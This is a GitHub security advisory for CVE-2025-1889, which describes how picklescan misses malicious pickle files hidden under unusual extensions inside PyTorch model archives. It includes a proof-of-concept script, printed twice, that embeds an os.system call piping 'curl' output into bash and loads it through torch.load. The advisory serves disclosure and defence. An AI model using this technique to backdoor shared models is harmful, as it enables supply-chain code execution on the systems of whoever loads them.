ghsa-769v-p64c-89pr
Vulnerability from github
Published
2025-03-03 19:59
Modified
2025-03-06 14:52
Severity ?
5.3 (Medium) - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N
Summary
PyTorch Model Files Can Bypass Pickle Scanners via Unexpected Pickle Extensions
Details

CVE-2025-1889

Summary

Picklescan fails to detect hidden pickle files embedded in PyTorch model archives due to its reliance on file extensions for detection. This allows an attacker to embed a secondary, malicious pickle file with a non-standard extension inside a model archive, which remains undetected by picklescan but is still loaded by PyTorch's torch.load() function. This can lead to arbitrary code execution when the model is loaded.

Details

Picklescan primarily identifies pickle files by their extensions (e.g., .pkl, .pt). However, PyTorch allows specifying an alternative pickle file inside a model archive using the pickle_file parameter when calling torch.load(). This makes it possible to embed a malicious pickle file (e.g., config.p) inside the model while keeping the primary data.pkl file benign.

A typical attack works as follows:

  • A PyTorch model (model.pt) is created and saved normally.
  • A second pickle file (config.p) containing a malicious payload is crafted.
  • The data.pkl file in the model is modified to contain an object that calls torch.load(model.pt, pickle_file='config.p'), causing config.p to be loaded when the model is opened.
  • Since picklescan ignores non-standard extensions, it does not scan config.p, allowing the malicious payload to evade detection.
  • The issue is exacerbated by the fact that PyTorch models are widely shared in ML repositories and organizations, making it a potential supply-chain attack vector.

PoC

``` import os import pickle import torch import zipfile from functools import partial

class RemoteCodeExecution: def reduce(self): return os.system, ("curl -s http://localhost:8080 | bash",)

Create a directory inside the model

os.makedirs("model", exist_ok=True)

Create a hidden malicious pickle file

with open("model/config.p", "wb") as f: pickle.dump(RemoteCodeExecution(), f)

Create a benign model

model = {} class AutoLoad: def init(self, path, **kwargs): self.path = path self.kwargs = kwargs

def __reduce__(self):
    # Use functools.partial to create a partially applied function
    # with torch.load and the pickle_file argument
    return partial(torch.load, self.path, **self.kwargs), ()

model['config'] = AutoLoad(model_name, pickle_file='config.p', weights_only=False) torch.save(model, "model.pt")

Inject the second pickle into the model archive

with zipfile.ZipFile("model.pt", "a") as archive: archive.write("model/config.p", "model/config.p")

Loading the model triggers execution of config.p

torch.load("model.pt") ```

Impact

Severity: High

Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models.

What is the impact? Attackers can embed malicious code in PyTorch models that remains undetected but executes when the model is loaded.

Potential Exploits: This vulnerability could be exploited in supply chain attacks, backdooring pre-trained models distributed via repositories like Hugging Face or PyTorch Hub.

Recommendations

  1. Scan All Files in the ZIP Archive: picklescan should analyze all files in the archive instead of relying on file extensions.
  2. Detect Hidden Pickle References: Static analysis should detect torch.load(pickle_file=...) calls inside data.pkl.
  3. Magic Byte Detection: Instead of relying on extensions, picklescan should inspect file contents for pickle magic bytes (\x80\x05).
  4. Block the following globals: - torch.load - Block functools.partial
Show details on source website

To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.0.21"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "picklescan"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.0.22"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-1889"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-646"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-03-03T19:59:46Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "### CVE-2025-1889\n\n### Summary\n\nPicklescan fails to detect hidden pickle files embedded in PyTorch model archives due to its reliance on file extensions for detection. This allows an attacker to embed a secondary, malicious pickle file with a non-standard extension inside a model archive, which remains undetected by picklescan but is still loaded by PyTorch\u0027s torch.load() function. This can lead to arbitrary code execution when the model is loaded.\n\n### Details\n\nPicklescan primarily identifies pickle files by their extensions (e.g., .pkl, .pt). However, PyTorch allows specifying an alternative pickle file inside a model archive using the pickle_file parameter when calling torch.load(). This makes it possible to embed a malicious pickle file (e.g., config.p) inside the model while keeping the primary data.pkl file benign.\n\nA typical attack works as follows:\n\n- A PyTorch model (model.pt) is created and saved normally.\n- A second pickle file (config.p) containing a malicious payload is crafted.\n- The data.pkl file in the model is modified to contain an object that calls torch.load(model.pt, pickle_file=\u0027config.p\u0027), causing config.p to be loaded when the model is opened.\n- Since picklescan ignores non-standard extensions, it does not scan config.p, allowing the malicious payload to evade detection.\n- The issue is exacerbated by the fact that PyTorch models are widely shared in ML repositories and organizations, making it a potential supply-chain attack vector.\n\n### PoC\n```\nimport os\nimport pickle\nimport torch\nimport zipfile\nfrom functools import partial\n\nclass RemoteCodeExecution:\n    def __reduce__(self):\n        return os.system, (\"curl -s http://localhost:8080 | bash\",)\n\n# Create a directory inside the model\nos.makedirs(\"model\", exist_ok=True)\n\n# Create a hidden malicious pickle file\nwith open(\"model/config.p\", \"wb\") as f:\n    pickle.dump(RemoteCodeExecution(), f)\n\n# Create a benign model\nmodel = {}\nclass AutoLoad:\n    def __init__(self, path, **kwargs):\n        self.path = path\n        self.kwargs = kwargs\n\n    def __reduce__(self):\n        # Use functools.partial to create a partially applied function\n        # with torch.load and the pickle_file argument\n        return partial(torch.load, self.path, **self.kwargs), ()\n\nmodel[\u0027config\u0027] = AutoLoad(model_name, pickle_file=\u0027config.p\u0027, weights_only=False)\ntorch.save(model, \"model.pt\")\n\n# Inject the second pickle into the model archive\nwith zipfile.ZipFile(\"model.pt\", \"a\") as archive:\n    archive.write(\"model/config.p\", \"model/config.p\")\n\n# Loading the model triggers execution of config.p\ntorch.load(\"model.pt\")\n```\n\n### Impact\n\nSeverity: High\n\nWho is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models.\n\nWhat is the impact? Attackers can embed malicious code in PyTorch models that remains undetected but executes when the model is loaded.\n\nPotential Exploits: This vulnerability could be exploited in supply chain attacks, backdooring pre-trained models distributed via repositories like Hugging Face or PyTorch Hub.\n\n### Recommendations\n\n1. Scan All Files in the ZIP Archive: picklescan should analyze all files in the archive instead of relying on file extensions.\n2. Detect Hidden Pickle References: Static analysis should detect torch.load(pickle_file=...) calls inside data.pkl.\n3. Magic Byte Detection: Instead of relying on extensions, picklescan should inspect file contents for pickle magic bytes (\\x80\\x05).\n4. Block the following globals:\n        - torch.load\n        - Block functools.partial",
  "id": "GHSA-769v-p64c-89pr",
  "modified": "2025-03-06T14:52:09Z",
  "published": "2025-03-03T19:59:46Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-769v-p64c-89pr"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-1889"
    },
    {
      "type": "WEB",
      "url": "https://github.com/mmaitre314/picklescan/commit/baf03faf88fece56a89534d12ce048e5ee36e50e"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/mmaitre314/picklescan"
    },
    {
      "type": "WEB",
      "url": "https://sites.google.com/sonatype.com/vulnerabilities/cve-2025-1889"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "PyTorch Model Files Can Bypass Pickle Scanners via Unexpected Pickle Extensions"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




  • Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
  • Confirmed: The vulnerability is confirmed from an analyst perspective.
  • Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
  • Patched: This vulnerability was successfully patched by the user reporting the sighting.
  • Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
  • Not confirmed: The user expresses doubt about the veracity of the vulnerability.
  • Not patched: This vulnerability was not successfully patched by the user reporting the sighting.